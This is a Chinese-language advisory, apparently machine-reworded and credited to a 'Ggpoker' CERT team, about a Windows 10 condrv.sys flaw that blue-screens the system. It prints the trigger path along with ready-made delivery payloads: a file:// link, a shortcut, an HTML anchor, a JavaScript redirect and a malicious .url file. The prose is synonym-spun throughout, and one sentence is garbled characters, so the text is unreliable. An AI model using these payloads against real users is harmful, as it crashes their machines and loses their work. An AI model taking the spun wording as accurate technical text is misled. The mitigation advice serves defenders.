近日，Ggpoker官网网络CERT安全应急响应团队追踪到一则Windows 10 condrv.sys存在内存败坏缝隙的信息，该缝隙直接导致Win10系统蓝屏。该缝隙是由于Windows 10中condrv驱动设置谬误导致的。 当Chrome 或Edge浏览器在打开特定链接时，刚好挪用了该驱动的相应函数，而IE没有挪用，因而IE不会受影响。另表，攻击者可能直接机关恶意代码直接挪用存在缝隙的函数，若是用户点击就会触发缝隙、导致蓝屏。

接见链接\\.\globalroot\device\condrv\kernelconnect会触发蓝屏。

• 用浏览器接见：

file://\\.\globalroot\device\condrv\kernelconnect

• 用一个快捷方式指向：

\\.\globalroot\device\condrv\kernelconnect

• 网页攻击：

例如a标签

<a href="file://\\.\globalroot\device\condrv\kernelconnect"></a>

<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>

以及JavaScript剧本。

•  微信群恶意用户传布名为test.url文件,在微信开启自动下载职能后文件被接管导致电脑即蓝屏

   

1. 接见该文件夹即蓝屏(url文件会自动要求文件图标而加载\\.\gxxx

2. 点击打开即蓝屏,文件内默认URL为\\.\gxxx

3. 电脑微信打开即蓝屏,电脑微信默认使用了微信当前目录下wechatweb.exe文件对Web内容进行加载,而该exe主题则是由QQ浏览器演变而来,而QQ浏览器内核又是选取的chrome内核,所以微信端打开即蓝屏

目前受影响的操作系统版本：Windows 10.1709及以上系统

该缝隙当前暂无官方解决规划。

产品当前官方暂未颁布受影响版本的对应补丁，建议受影响的用户实时关注更新官方的安全补。ㄊ凳备律兜阶钚掳姹荆。链接如下：

https://www.microsoft.com/zh-cn/software-download/windows10

• 不要打开陌生网页，若是不用要建议不容JavaScript。

• 不要打开陌生法式，终端装置防护软件。

• 不要轻易下载装置起源不明的软件，预防有人恶意利用此缝隙造成回绝服务攻击。

• 对不明来历的邮件、office等提高警惕。

• 警惕不明来历压缩文件，为了让受害者下载Windows快捷方式(.url)文件。攻击者会通过糊弄用户下载ZIP归档文件，并将恶意字符串暗藏其中；当用户解压ZIP文件时便会触发攻击。

• 实时备份沉要文件，以免文件迷失。

Ggpoker官网网络CERT安全应急响应团队，跟踪最新互联网威胁事务，针对最新安全缝隙，APT攻击以及僵尸网络家族做实时跟踪和分析;为产品、客户提供实时、有效的安全防护战术与解决规划。